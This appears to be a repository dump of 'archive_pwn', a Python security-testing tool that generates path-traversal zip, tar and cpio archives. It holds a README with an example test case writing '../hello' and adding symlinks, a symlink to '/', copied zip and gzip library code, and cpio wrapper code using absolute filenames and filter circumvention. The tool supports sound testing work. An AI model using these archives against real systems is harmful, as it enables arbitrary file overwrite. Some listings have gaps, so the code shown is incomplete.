├── folder-to-pack ├── A │ └── C ├── B ├── symlinkA ├── symlinkB ├── symlinkRoot ├── hardlinkB └── META-INF │ ├── substrate │ └── config │ │ └── reflectionconfig.json │ ├── services │ └── java.security.Provider │ └── MANIFEST.MF ├── cpio-2.14-darwin ├── fipfile ├── __main__.py ├── _path.py └── __init__.py ├── README.rst ├── fzip.py └── archive_pwn.py /folder-to-pack/A/C: -------------------------------------------------------------------------------- 1 | C contents -------------------------------------------------------------------------------- /folder-to-pack/B: -------------------------------------------------------------------------------- 1 | B contents -------------------------------------------------------------------------------- /folder-to-pack/symlinkA: -------------------------------------------------------------------------------- 1 | A -------------------------------------------------------------------------------- /folder-to-pack/symlinkB: -------------------------------------------------------------------------------- 1 | B -------------------------------------------------------------------------------- /folder-to-pack/symlinkRoot: -------------------------------------------------------------------------------- 1 | / -------------------------------------------------------------------------------- /folder-to-pack/hardlinkB: -------------------------------------------------------------------------------- 1 | B contents -------------------------------------------------------------------------------- /cpio-2.14-darwin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pentagridsec/archive_pwn/HEAD/cpio-2.14-darwin -------------------------------------------------------------------------------- /folder-to-pack/META-INF/substrate/config/reflectionconfig.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "name":"test", 4 | 
"allDeclaredMethods":true 5 | } 6 | ] -------------------------------------------------------------------------------- /folder-to-pack/META-INF/services/java.security.Provider: -------------------------------------------------------------------------------- 1 | org.bouncycastle.jce.provider.BouncyCastleProvider 2 | org.bouncycastle.pqc.jcajce.provider.BouncyCastlePQCProvider 3 | -------------------------------------------------------------------------------- /folder-to-pack/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Foo-Compatibility-Version: 4 3 | Implementation-Name: yesname 4 | Implementation-Version: 1337 5 | Implementation-Vendor: Acme Org 6 | Specification-Name: yesname 7 | Specification-Vendor: Acme Org 8 | Multi-Release: true 9 | JAR-Type: Standalone 10 | Main-Class: example.StartClass 11 | SplashScreen-Image: symlinkRoot 12 | Add-Opens: java.base/java.lang 13 | -------------------------------------------------------------------------------- /fipfile/__main__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | from . import ZipFile, ZIP_DEFLATED 4 | 5 | 6 | def main(args=None): 7 | import argparse 8 | 9 | description = 'A simple command-line interface for zipfile module.' 
10 | parser = argparse.ArgumentParser(description=description) 11 | group = parser.add_mutually_exclusive_group(required=True) 12 | group.add_argument('-l', '--list', metavar='', 13 | help='Show listing of a zipfile') 14 | group.add_argument('-e', '--extract', nargs=2, 15 | metavar=('', ''), 16 | help='Extract zipfile into target dir') 17 | group.add_argument('-c', '--create', nargs='+', 18 | metavar=('', ''), 19 | help='Create zipfile from sources') 20 | group.add_argument('-t', '--test', metavar='', 21 | help='Test if a zipfile is valid') 22 | parser.add_argument('--metadata-encoding', metavar='', 23 | help='Specify encoding of member names for -l, -e and -t') 24 | args = parser.parse_args(args) 25 | 26 | encoding = args.metadata_encoding 27 | 28 | if args.test is not None: 29 | src = args.test 30 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 31 | badfile = zf.testzip() 32 | if badfile: 33 | print("The following enclosed file is corrupted: {!r}".format(badfile)) 34 | print("Done testing") 35 | 36 | elif args.list is not None: 37 | src = args.list 38 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 39 | zf.printdir() 40 | 41 | elif args.extract is not None: 42 | src, curdir = args.extract 43 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 44 | zf.extractall(curdir) 45 | 46 | elif args.create is not None: 47 | if encoding: 48 | print("Non-conforming encodings not supported with -c.", 49 | file=sys.stderr) 50 | sys.exit(1) 51 | 52 | zip_name = args.create.pop(0) 53 | files = args.create 54 | 55 | def addToZip(zf, path, zippath): 56 | if os.path.isfile(path): 57 | zf.write(path, zippath, ZIP_DEFLATED) 58 | elif os.path.isdir(path): 59 | if zippath: 60 | zf.write(path, zippath) 61 | for nm in sorted(os.listdir(path)): 62 | addToZip(zf, 63 | os.path.join(path, nm), os.path.join(zippath, nm)) 64 | # else: ignore 65 | 66 | with ZipFile(zip_name, 'w') as zf: 67 | for path in files: 68 | zippath = os.path.basename(path) 69 | if not 
zippath: 70 | zippath = os.path.basename(os.path.dirname(path)) 71 | if zippath in ('', os.curdir, os.pardir): 72 | zippath = '' 73 | addToZip(zf, path, zippath) 74 | 75 | 76 | if __name__ == "__main__": 77 | main() 78 | -------------------------------------------------------------------------------- /README.rst: -------------------------------------------------------------------------------- 1 | `Pentagrid `_'s ``archive pwn`` is a Python-based tool to create zip, tar and cpio archives to exploit common archive library issues and developer mistakes. 2 | 3 | .. contents:: 4 | :local: 5 | 6 | Archive pwn 7 | =========== 8 | 9 | This is just another tool to create archive formats (zip, tar, cpio only for now) which try to write outside of the current working directory when extracted. 10 | 11 | It's a very old vulnerability class where a lot of things have been written about. Just to mention some of the most similar/best known ones: 12 | 13 | - https://github.com/jwilk/traversal-archives - A tool that creates the simple examples we create here too, but with Makefiles. Supports more archive formats. 14 | - https://github.com/0xless/slip - A proper command line tool that allows configuring the payloads. Supports no cpio, but some other archive formats we don't. 15 | - https://github.com/snyk/zip-slip-vulnerability - Research about the topic 16 | - https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/ - One of our advisories where we exploited VxWorks tarExtract function, the blog post deep dives a little more into the different archive vulnerabilities 17 | 18 | Our tool here is therefore not "new", but different. Advantages of this tool: 19 | 20 | - Support for hardlinks in TAR files 21 | - Includes the contents of the folder "folder-to-pack" in the archive. 
This is important if the attacked system first checks for the existence of certain files in the archive or even does signature checks on them (think "embedded device secure software update"). 22 | - Added some more complex examples (ideas often taken from old vulnerabilities), e.g. maximum Windows path length attacks, unicode normalisation, DoS via very deep directory 23 | - Modifiable by people who like Python, easy to add your own idea of a malicious archive. The current working directory (cwd) will be changed to the "folder-to-pack" folder by the script. You can then easily add another test case, e.g.: 24 | 25 | :: 26 | 27 | attack_name = "my_example_archive_attack" 28 | for archive in creator.create(attack_name): 29 | try: 30 | archive.add_cwd_content() # Adds the entire content of the folder "folder-to-pack" to the archive 31 | archive.add_dir("an-example-dir") # Some unpacking libraries allow omitting this line (and therefore ignore missing parent directories, see next line) 32 | archive.add_dir("an-example-dir/another-one") 33 | archive.add_dummy_file_at_path("an-example-dir/another-one/") # Adds a file according to naming convention, e.g. a file "an-example-dir/another-one/my_example_archive_attack_" 34 | archive.add_dummy_dir_at_path("an-example-dir/") # Adds a dir according to naming convention, e.g. a dir "an-example-dir/my_example_archive_attack_" 35 | archive.add_symlink("an-example-dir/another-one/A", "an-example-dir") # Adds a symlink an-example-dir/another-one/A -> an-example-dir 36 | archive.add_hardlink("an-example-dir/another-one/B", "an-example-dir") # Attention, no hardlink support for zip and cpio, will throw UnsupportedException and only create tars! 
37 | archive.add_file("../hello", "darkness my old friend") # Creates an archive entry "../hello" with file content "darkness my old friend" 38 | archive.close() 39 | except UnsupportedException as e: 40 | Logger.info(e) if not 'ustar' in str(e) else "" # ustar tar archives have very limited space for filenames of certain lengths 41 | archive.close_and_remove() 42 | 43 | 44 | Please be aware, the tool creates a lot of files (last time we checked 96'314 files). 45 | 46 | Usage 47 | ===== 48 | 49 | Make sure you have Python 3 and GNU cpio installed as the "cpio" command (on Intel MacOS it will fall back on the cpio-2.14-darwin binary included). Put anything you want packed into the archive alongside the attack into "folder-to-pack". Then just run `python3 archive_pwn.py` in that directory. It will create an "output" folder. 50 | -------------------------------------------------------------------------------- /fipfile/_path.py: -------------------------------------------------------------------------------- 1 | import io 2 | import posixpath 3 | import zipfile 4 | import itertools 5 | import contextlib 6 | import pathlib 7 | import re 8 | import fnmatch 9 | 10 | 11 | __all__ = ['Path'] 12 | 13 | 14 | def _parents(path): 15 | """ 16 | Given a path with elements separated by 17 | posixpath.sep, generate all parents of that path.
18 | 19 | >>> list(_parents('b/d')) 20 | ['b'] 21 | >>> list(_parents('/b/d/')) 22 | ['/b'] 23 | >>> list(_parents('b/d/f/')) 24 | ['b/d', 'b'] 25 | >>> list(_parents('b')) 26 | [] 27 | >>> list(_parents('')) 28 | [] 29 | """ 30 | return itertools.islice(_ancestry(path), 1, None) 31 | 32 | 33 | def _ancestry(path): 34 | """ 35 | Given a path with elements separated by 36 | posixpath.sep, generate all elements of that path 37 | 38 | >>> list(_ancestry('b/d')) 39 | ['b/d', 'b'] 40 | >>> list(_ancestry('/b/d/')) 41 | ['/b/d', '/b'] 42 | >>> list(_ancestry('b/d/f/')) 43 | ['b/d/f', 'b/d', 'b'] 44 | >>> list(_ancestry('b')) 45 | ['b'] 46 | >>> list(_ancestry('')) 47 | [] 48 | """ 49 | path = path.rstrip(posixpath.sep) 50 | while path and path != posixpath.sep: 51 | yield path 52 | path, tail = posixpath.split(path) 53 | 54 | 55 | _dedupe = dict.fromkeys 56 | """Deduplicate an iterable in original order""" 57 | 58 | 59 | def _difference(minuend, subtrahend): 60 | """ 61 | Return items in minuend not in subtrahend, retaining order 62 | with O(1) lookup. 63 | """ 64 | return itertools.filterfalse(set(subtrahend).__contains__, minuend) 65 | 66 | 67 | class InitializedState: 68 | """ 69 | Mix-in to save the initialization state for pickling. 70 | """ 71 | 72 | def __init__(self, *args, **kwargs): 73 | self.__args = args 74 | self.__kwargs = kwargs 75 | super().__init__(*args, **kwargs) 76 | 77 | def __getstate__(self): 78 | return self.__args, self.__kwargs 79 | 80 | def __setstate__(self, state): 81 | args, kwargs = state 82 | super().__init__(*args, **kwargs) 83 | 84 | 85 | class CompleteDirs(InitializedState, zipfile.ZipFile): 86 | """ 87 | A ZipFile subclass that ensures that implied directories 88 | are always included in the namelist. 
89 | 90 | >>> list(CompleteDirs._implied_dirs(['foo/bar.txt', 'foo/bar/baz.txt'])) 91 | ['foo/', 'foo/bar/'] 92 | >>> list(CompleteDirs._implied_dirs(['foo/bar.txt', 'foo/bar/baz.txt', 'foo/bar/'])) 93 | ['foo/'] 94 | """ 95 | 96 | @staticmethod 97 | def _implied_dirs(names): 98 | parents = itertools.chain.from_iterable(map(_parents, names)) 99 | as_dirs = (p + posixpath.sep for p in parents) 100 | return _dedupe(_difference(as_dirs, names)) 101 | 102 | def namelist(self): 103 | names = super().namelist() 104 | return names + list(self._implied_dirs(names)) 105 | 106 | def _name_set(self): 107 | return set(self.namelist()) 108 | 109 | def resolve_dir(self, name): 110 | """ 111 | If the name represents a directory, return that name 112 | as a directory (with the trailing slash). 113 | """ 114 | names = self._name_set() 115 | dirname = name + '/' 116 | dir_match = name not in names and dirname in names 117 | return dirname if dir_match else name 118 | 119 | def getinfo(self, name): 120 | """ 121 | Supplement getinfo for implied dirs. 122 | """ 123 | try: 124 | return super().getinfo(name) 125 | except KeyError: 126 | if not name.endswith('/') or name not in self._name_set(): 127 | raise 128 | return zipfile.ZipInfo(filename=name) 129 | 130 | @classmethod 131 | def make(cls, source): 132 | """ 133 | Given a source (filename or zipfile), return an 134 | appropriate CompleteDirs subclass. 135 | """ 136 | if isinstance(source, CompleteDirs): 137 | return source 138 | 139 | if not isinstance(source, zipfile.ZipFile): 140 | return cls(source) 141 | 142 | # Only allow for FastLookup when supplied zipfile is read-only 143 | if 'r' not in source.mode: 144 | cls = CompleteDirs 145 | 146 | source.__class__ = cls 147 | return source 148 | 149 | 150 | class FastLookup(CompleteDirs): 151 | """ 152 | ZipFile subclass to ensure implicit 153 | dirs exist and are resolved rapidly. 
154 | """ 155 | 156 | def namelist(self): 157 | with contextlib.suppress(AttributeError): 158 | return self.__names 159 | self.__names = super().namelist() 160 | return self.__names 161 | 162 | def _name_set(self): 163 | with contextlib.suppress(AttributeError): 164 | return self.__lookup 165 | self.__lookup = super()._name_set() 166 | return self.__lookup 167 | 168 | 169 | def _extract_text_encoding(encoding=None, *args, **kwargs): 170 | # stacklevel=3 so that the caller of the caller see any warning. 171 | return io.text_encoding(encoding, 3), args, kwargs 172 | 173 | 174 | class Path: 175 | """ 176 | A pathlib-compatible interface for zip files. 177 | 178 | Consider a zip file with this structure:: 179 | 180 | . 181 | ├── a.txt 182 | └── b 183 | ├── c.txt 184 | └── d 185 | └── e.txt 186 | 187 | >>> data = io.BytesIO() 188 | >>> zf = ZipFile(data, 'w') 189 | >>> zf.writestr('a.txt', 'content of a') 190 | >>> zf.writestr('b/c.txt', 'content of c') 191 | >>> zf.writestr('b/d/e.txt', 'content of e') 192 | >>> zf.filename = 'mem/abcde.zip' 193 | 194 | Path accepts the zipfile object itself or a filename 195 | 196 | >>> root = Path(zf) 197 | 198 | From there, several path operations are available. 
199 | 200 | Directory iteration (including the zip file itself): 201 | 202 | >>> a, b = root.iterdir() 203 | >>> a 204 | Path('mem/abcde.zip', 'a.txt') 205 | >>> b 206 | Path('mem/abcde.zip', 'b/') 207 | 208 | name property: 209 | 210 | >>> b.name 211 | 'b' 212 | 213 | join with divide operator: 214 | 215 | >>> c = b / 'c.txt' 216 | >>> c 217 | Path('mem/abcde.zip', 'b/c.txt') 218 | >>> c.name 219 | 'c.txt' 220 | 221 | Read text: 222 | 223 | >>> c.read_text(encoding='utf-8') 224 | 'content of c' 225 | 226 | existence: 227 | 228 | >>> c.exists() 229 | True 230 | >>> (b / 'missing.txt').exists() 231 | False 232 | 233 | Coercion to string: 234 | 235 | >>> import os 236 | >>> str(c).replace(os.sep, posixpath.sep) 237 | 'mem/abcde.zip/b/c.txt' 238 | 239 | At the root, ``name``, ``filename``, and ``parent`` 240 | resolve to the zipfile. Note these attributes are not 241 | valid and will raise a ``ValueError`` if the zipfile 242 | has no filename. 243 | 244 | >>> root.name 245 | 'abcde.zip' 246 | >>> str(root.filename).replace(os.sep, posixpath.sep) 247 | 'mem/abcde.zip' 248 | >>> str(root.parent) 249 | 'mem' 250 | """ 251 | 252 | __repr = "{self.__class__.__name__}({self.root.filename!r}, {self.at!r})" 253 | 254 | def __init__(self, root, at=""): 255 | """ 256 | Construct a Path from a ZipFile or filename. 257 | 258 | Note: When the source is an existing ZipFile object, 259 | its type (__class__) will be mutated to a 260 | specialized type. If the caller wishes to retain the 261 | original type, the caller should either create a 262 | separate ZipFile object or pass a filename. 
263 | """ 264 | self.root = FastLookup.make(root) 265 | self.at = at 266 | 267 | def __eq__(self, other): 268 | """ 269 | >>> Path(zipfile.ZipFile(io.BytesIO(), 'w')) == 'foo' 270 | False 271 | """ 272 | if self.__class__ is not other.__class__: 273 | return NotImplemented 274 | return (self.root, self.at) == (other.root, other.at) 275 | 276 | def __hash__(self): 277 | return hash((self.root, self.at)) 278 | 279 | def open(self, mode='r', *args, pwd=None, **kwargs): 280 | """ 281 | Open this entry as text or binary following the semantics 282 | of ``pathlib.Path.open()`` by passing arguments through 283 | to io.TextIOWrapper(). 284 | """ 285 | if self.is_dir(): 286 | raise IsADirectoryError(self) 287 | zip_mode = mode[0] 288 | if not self.exists() and zip_mode == 'r': 289 | raise FileNotFoundError(self) 290 | stream = self.root.open(self.at, zip_mode, pwd=pwd) 291 | if 'b' in mode: 292 | if args or kwargs: 293 | raise ValueError("encoding args invalid for binary operation") 294 | return stream 295 | # Text mode: 296 | encoding, args, kwargs = _extract_text_encoding(*args, **kwargs) 297 | return io.TextIOWrapper(stream, encoding, *args, **kwargs) 298 | 299 | @property 300 | def name(self): 301 | return pathlib.Path(self.at).name or self.filename.name 302 | 303 | @property 304 | def suffix(self): 305 | return pathlib.Path(self.at).suffix or self.filename.suffix 306 | 307 | @property 308 | def suffixes(self): 309 | return pathlib.Path(self.at).suffixes or self.filename.suffixes 310 | 311 | @property 312 | def stem(self): 313 | return pathlib.Path(self.at).stem or self.filename.stem 314 | 315 | @property 316 | def filename(self): 317 | return pathlib.Path(self.root.filename).joinpath(self.at) 318 | 319 | def read_text(self, *args, **kwargs): 320 | encoding, args, kwargs = _extract_text_encoding(*args, **kwargs) 321 | with self.open('r', encoding, *args, **kwargs) as strm: 322 | return strm.read() 323 | 324 | def read_bytes(self): 325 | with self.open('rb') as strm: 326 
| return strm.read() 327 | 328 | def _is_child(self, path): 329 | return posixpath.dirname(path.at.rstrip("/")) == self.at.rstrip("/") 330 | 331 | def _next(self, at): 332 | return self.__class__(self.root, at) 333 | 334 | def is_dir(self): 335 | return not self.at or self.at.endswith("/") 336 | 337 | def is_file(self): 338 | return self.exists() and not self.is_dir() 339 | 340 | def exists(self): 341 | return self.at in self.root._name_set() 342 | 343 | def iterdir(self): 344 | if not self.is_dir(): 345 | raise ValueError("Can't listdir a file") 346 | subs = map(self._next, self.root.namelist()) 347 | return filter(self._is_child, subs) 348 | 349 | def match(self, path_pattern): 350 | return pathlib.Path(self.at).match(path_pattern) 351 | 352 | def is_symlink(self): 353 | """ 354 | Return whether this path is a symlink. Always false (python/cpython#82102). 355 | """ 356 | return False 357 | 358 | def _descendants(self): 359 | for child in self.iterdir(): 360 | yield child 361 | if child.is_dir(): 362 | yield from child._descendants() 363 | 364 | def glob(self, pattern): 365 | if not pattern: 366 | raise ValueError(f"Unacceptable pattern: {pattern!r}") 367 | 368 | matches = re.compile(fnmatch.translate(pattern)).fullmatch 369 | return ( 370 | child 371 | for child in self._descendants() 372 | if matches(str(child.relative_to(self))) 373 | ) 374 | 375 | def rglob(self, pattern): 376 | return self.glob(f'**/{pattern}') 377 | 378 | def relative_to(self, other, *extra): 379 | return posixpath.relpath(str(self), str(other.joinpath(*extra))) 380 | 381 | def __str__(self): 382 | return posixpath.join(self.root.filename, self.at) 383 | 384 | def __repr__(self): 385 | return self.__repr.format(self=self) 386 | 387 | def joinpath(self, *other): 388 | next = posixpath.join(self.at, *other) 389 | return self._next(self.root.resolve_dir(next)) 390 | 391 | __truediv__ = joinpath 392 | 393 | @property 394 | def parent(self): 395 | if not self.at: 396 | return self.filename.parent 
397 | parent_at = posixpath.dirname(self.at.rstrip('/')) 398 | if parent_at: 399 | parent_at += '/' 400 | return self._next(parent_at) 401 | -------------------------------------------------------------------------------- /fzip.py: -------------------------------------------------------------------------------- 1 | """Functions that read and write gzipped files. 2 | 3 | The user of the file doesn't have to worry about the compression, 4 | but random access is not allowed.""" 5 | 6 | # based on Andrew Kuchling's minigzip.py distributed with the zlib module 7 | 8 | import struct, sys, time, os 9 | import zlib 10 | import builtins 11 | import io 12 | import _compression 13 | 14 | __all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"] 15 | 16 | FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16 17 | 18 | READ, WRITE = 1, 2 19 | 20 | _COMPRESS_LEVEL_FAST = 1 21 | _COMPRESS_LEVEL_TRADEOFF = 6 22 | _COMPRESS_LEVEL_BEST = 9 23 | 24 | READ_BUFFER_SIZE = 128 * 1024 25 | 26 | 27 | def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST, 28 | encoding=None, errors=None, newline=None): 29 | """Open a gzip-compressed file in binary or text mode. 30 | 31 | The filename argument can be an actual filename (a str or bytes object), or 32 | an existing file object to read from or write to. 33 | 34 | The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for 35 | binary mode, or "rt", "wt", "xt" or "at" for text mode. The default mode is 36 | "rb", and the default compresslevel is 9. 37 | 38 | For binary mode, this function is equivalent to the GzipFile constructor: 39 | GzipFile(filename, mode, compresslevel). In this case, the encoding, errors 40 | and newline arguments must not be provided. 41 | 42 | For text mode, a GzipFile object is created, and wrapped in an 43 | io.TextIOWrapper instance with the specified encoding, error handling 44 | behavior, and line ending(s). 
45 | 46 | """ 47 | if "t" in mode: 48 | if "b" in mode: 49 | raise ValueError("Invalid mode: %r" % (mode,)) 50 | else: 51 | if encoding is not None: 52 | raise ValueError("Argument 'encoding' not supported in binary mode") 53 | if errors is not None: 54 | raise ValueError("Argument 'errors' not supported in binary mode") 55 | if newline is not None: 56 | raise ValueError("Argument 'newline' not supported in binary mode") 57 | 58 | gz_mode = mode.replace("t", "") 59 | if isinstance(filename, (str, bytes, os.PathLike)): 60 | binary_file = GzipFile(filename, gz_mode, compresslevel) 61 | elif hasattr(filename, "read") or hasattr(filename, "write"): 62 | binary_file = GzipFile(None, gz_mode, compresslevel, filename) 63 | else: 64 | raise TypeError("filename must be a str or bytes object, or a file") 65 | 66 | if "t" in mode: 67 | encoding = io.text_encoding(encoding) 68 | return io.TextIOWrapper(binary_file, encoding, errors, newline) 69 | else: 70 | return binary_file 71 | 72 | def write32u(output, value): 73 | # The L format writes the bit pattern correctly whether signed 74 | # or unsigned. 75 | output.write(struct.pack("' 225 | 226 | def _init_write(self, filename): 227 | self.name = filename 228 | self.crc = zlib.crc32(b"") 229 | self.size = 0 230 | self.writebuf = [] 231 | self.bufsize = 0 232 | self.offset = 0 # Current file offset for seek(), tell(), etc 233 | 234 | def _write_gzip_header(self, compresslevel): 235 | self.fileobj.write(b'\037\213') # magic header 236 | self.fileobj.write(b'\010') # compression method 237 | try: 238 | if self.gz_tar_name: 239 | fname = self.gz_tar_name 240 | else: 241 | # RFC 1952 requires the FNAME field to be Latin-1. Do not 242 | # include filenames that cannot be represented that way. 
243 | fname = os.path.basename(self.name) 244 | if not isinstance(fname, bytes): 245 | fname = fname.encode('latin-1') 246 | if fname.endswith(b'.gz'): 247 | fname = fname[:-3] 248 | except UnicodeEncodeError: 249 | fname = b'' 250 | flags = 0 251 | if fname: 252 | flags = FNAME 253 | self.fileobj.write(chr(flags).encode('latin-1')) 254 | mtime = self._write_mtime 255 | if mtime is None: 256 | mtime = time.time() 257 | write32u(self.fileobj, int(mtime)) 258 | if compresslevel == _COMPRESS_LEVEL_BEST: 259 | xfl = b'\002' 260 | elif compresslevel == _COMPRESS_LEVEL_FAST: 261 | xfl = b'\004' 262 | else: 263 | xfl = b'\000' 264 | self.fileobj.write(xfl) 265 | self.fileobj.write(b'\377') 266 | if fname: 267 | self.fileobj.write(fname + b'\000') 268 | 269 | def write(self,data): 270 | self._check_not_closed() 271 | if self.mode != WRITE: 272 | import errno 273 | raise OSError(errno.EBADF, "write() on read-only GzipFile object") 274 | 275 | if self.fileobj is None: 276 | raise ValueError("write() on closed GzipFile object") 277 | 278 | if isinstance(data, (bytes, bytearray)): 279 | length = len(data) 280 | else: 281 | # accept any data that supports the buffer protocol 282 | data = memoryview(data) 283 | length = data.nbytes 284 | 285 | if length > 0: 286 | self.fileobj.write(self.compress.compress(data)) 287 | self.size += length 288 | self.crc = zlib.crc32(data, self.crc) 289 | self.offset += length 290 | 291 | return length 292 | 293 | def read(self, size=-1): 294 | self._check_not_closed() 295 | if self.mode != READ: 296 | import errno 297 | raise OSError(errno.EBADF, "read() on write-only GzipFile object") 298 | return self._buffer.read(size) 299 | 300 | def read1(self, size=-1): 301 | """Implements BufferedIOBase.read1() 302 | 303 | Reads up to a buffer's worth of data if size is negative.""" 304 | self._check_not_closed() 305 | if self.mode != READ: 306 | import errno 307 | raise OSError(errno.EBADF, "read1() on write-only GzipFile object") 308 | 309 | if size < 0: 
310 | size = io.DEFAULT_BUFFER_SIZE 311 | return self._buffer.read1(size) 312 | 313 | def peek(self, n): 314 | self._check_not_closed() 315 | if self.mode != READ: 316 | import errno 317 | raise OSError(errno.EBADF, "peek() on write-only GzipFile object") 318 | return self._buffer.peek(n) 319 | 320 | @property 321 | def closed(self): 322 | return self.fileobj is None 323 | 324 | def close(self): 325 | fileobj = self.fileobj 326 | if fileobj is None: 327 | return 328 | self.fileobj = None 329 | try: 330 | if self.mode == WRITE: 331 | fileobj.write(self.compress.flush()) 332 | write32u(fileobj, self.crc) 333 | # self.size may exceed 2 GiB, or even 4 GiB 334 | write32u(fileobj, self.size & 0xffffffff) 335 | elif self.mode == READ: 336 | self._buffer.close() 337 | finally: 338 | myfileobj = self.myfileobj 339 | if myfileobj: 340 | self.myfileobj = None 341 | myfileobj.close() 342 | 343 | def flush(self,zlib_mode=zlib.Z_SYNC_FLUSH): 344 | self._check_not_closed() 345 | if self.mode == WRITE: 346 | # Ensure the compressor's buffer is flushed 347 | self.fileobj.write(self.compress.flush(zlib_mode)) 348 | self.fileobj.flush() 349 | 350 | def fileno(self): 351 | """Invoke the underlying file object's fileno() method. 352 | 353 | This will raise AttributeError if the underlying file object 354 | doesn't support fileno(). 
355 | """ 356 | return self.fileobj.fileno() 357 | 358 | def rewind(self): 359 | '''Return the uncompressed stream file position indicator to the 360 | beginning of the file''' 361 | if self.mode != READ: 362 | raise OSError("Can't rewind in write mode") 363 | self._buffer.seek(0) 364 | 365 | def readable(self): 366 | return self.mode == READ 367 | 368 | def writable(self): 369 | return self.mode == WRITE 370 | 371 | def seekable(self): 372 | return True 373 | 374 | def seek(self, offset, whence=io.SEEK_SET): 375 | if self.mode == WRITE: 376 | if whence != io.SEEK_SET: 377 | if whence == io.SEEK_CUR: 378 | offset = self.offset + offset 379 | else: 380 | raise ValueError('Seek from end not supported') 381 | if offset < self.offset: 382 | raise OSError('Negative seek in write mode') 383 | count = offset - self.offset 384 | chunk = b'\0' * 1024 385 | for i in range(count // 1024): 386 | self.write(chunk) 387 | self.write(b'\0' * (count % 1024)) 388 | elif self.mode == READ: 389 | self._check_not_closed() 390 | return self._buffer.seek(offset, whence) 391 | 392 | return self.offset 393 | 394 | def readline(self, size=-1): 395 | self._check_not_closed() 396 | return self._buffer.readline(size) 397 | 398 | 399 | def _read_exact(fp, n): 400 | '''Read exactly *n* bytes from `fp` 401 | 402 | This method is required because fp may be unbuffered, 403 | i.e. return short reads. 404 | ''' 405 | data = fp.read(n) 406 | while len(data) < n: 407 | b = fp.read(n - len(data)) 408 | if not b: 409 | raise EOFError("Compressed file ended before the " 410 | "end-of-stream marker was reached") 411 | data += b 412 | return data 413 | 414 | 415 | def _read_gzip_header(fp): 416 | '''Read a gzip header from `fp` and progress to the end of the header. 417 | 418 | Returns last mtime if header was present or None otherwise. 
419 | ''' 420 | magic = fp.read(2) 421 | if magic == b'': 422 | return None 423 | 424 | if magic != b'\037\213': 425 | raise BadGzipFile('Not a gzipped file (%r)' % magic) 426 | 427 | (method, flag, last_mtime) = struct.unpack(" bytes: 552 | """ 553 | Write a simple gzip header with no extra fields. 554 | :param compresslevel: Compresslevel used to determine the xfl bytes. 555 | :param mtime: The mtime (must support conversion to a 32-bit integer). 556 | :return: A bytes object representing the gzip header. 557 | """ 558 | if mtime is None: 559 | mtime = time.time() 560 | if compresslevel == _COMPRESS_LEVEL_BEST: 561 | xfl = 2 562 | elif compresslevel == _COMPRESS_LEVEL_FAST: 563 | xfl = 4 564 | else: 565 | xfl = 0 566 | # Pack ID1 and ID2 magic bytes, method (8=deflate), header flags (no extra 567 | # fields added to header), mtime, xfl and os (255 for unknown OS). 568 | return struct.pack(" [archive] 560 | # -J,-y,-z,--lzma Compress archive with xz/bzip2/gzip/lzma 561 | # --format {odc|newc|ustar} Select archive format 562 | # List: cpio -it < [archive] 563 | # Extract: cpio -i [options] < [archive] 564 | # bsdcpio 3.5.1 - libarchive 3.5.1 zlib/1.2.11 liblzma/5.0.5 bz2lib/1.0.8 565 | 566 | # GNU cpio supports many more formats: 567 | # % ./cpio-2.14/cpio --version 568 | # cpio (GNU cpio) 2.14 569 | # Copyright (C) 2023 Free Software Foundation, Inc. 570 | # License GPLv3+: GNU GPL version 3 or later . 571 | # This is free software: you are free to change and redistribute it. 572 | # There is NO WARRANTY, to the extent permitted by law. 573 | # 574 | # Written by Phil Nelson, David MacKenzie, John Oleynick, 575 | # and Sergey Poznyakoff. 
576 | 577 | # None of the python bindings of CPIO is really sufficient 578 | 579 | FILETYPE = "cpio" 580 | 581 | ABSOLUT_FILENAMES = '--absolute-filenames' 582 | CREATE_ARG = ["--create"] 583 | APPEND_ARG = ["--create", "--append"] 584 | 585 | FORMAT_ARG = "--format=" 586 | OUTPUT_ARG = '-O' 587 | ASCII_ARG = "-c" 588 | 589 | def __init__(self, gnu_cpio_binary, attack_name, format): 590 | super().__init__(attack_name) 591 | self.gnu_cpio_binary = gnu_cpio_binary 592 | self.format = format 593 | if os.path.isfile(self.get_output_path()): 594 | raise FileAlreadyExistsException(f"File already exists: {self.get_output_path()}") 595 | 596 | #self.archive_out_file = libarchive.Archive(self.get_output_path(), 'w') 597 | self.output_path = self.get_output_path() 598 | self.was_created = False 599 | self.replacements = [] 600 | self.init_logfile() 601 | 602 | def _get_command(self): 603 | cmd = [self.gnu_cpio_binary, ] 604 | cmd.extend(self._arg_create_or_append()) 605 | if self.format == "ascii": 606 | cmd.append(CustomCpioArchive.ASCII_ARG) 607 | else: 608 | cmd.append(CustomCpioArchive.FORMAT_ARG + self.format) 609 | cmd.extend([CustomCpioArchive.ABSOLUT_FILENAMES, 610 | CustomCpioArchive.OUTPUT_ARG, self.output_path]) 611 | #print(cmd) 612 | return cmd 613 | 614 | def _arg_create_or_append(self): 615 | if self.was_created: 616 | return CustomCpioArchive.APPEND_ARG 617 | else: 618 | self.was_created = True 619 | return CustomCpioArchive.CREATE_ARG 620 | 621 | def _add_nonexisting_circumvent_filtering(self, name, type, content=FILE_CONTENT, to_name=None): 622 | # type: 623 | # 0 = file 624 | # 1 = directory 625 | # 2 = symlink 626 | name_to_use = name 627 | repeat = 0 628 | success = False 629 | errors = "" 630 | while repeat < 5: 631 | # Is this file safe to create and is it then stored in the cwd? 632 | if not "/" in name and name != "." 
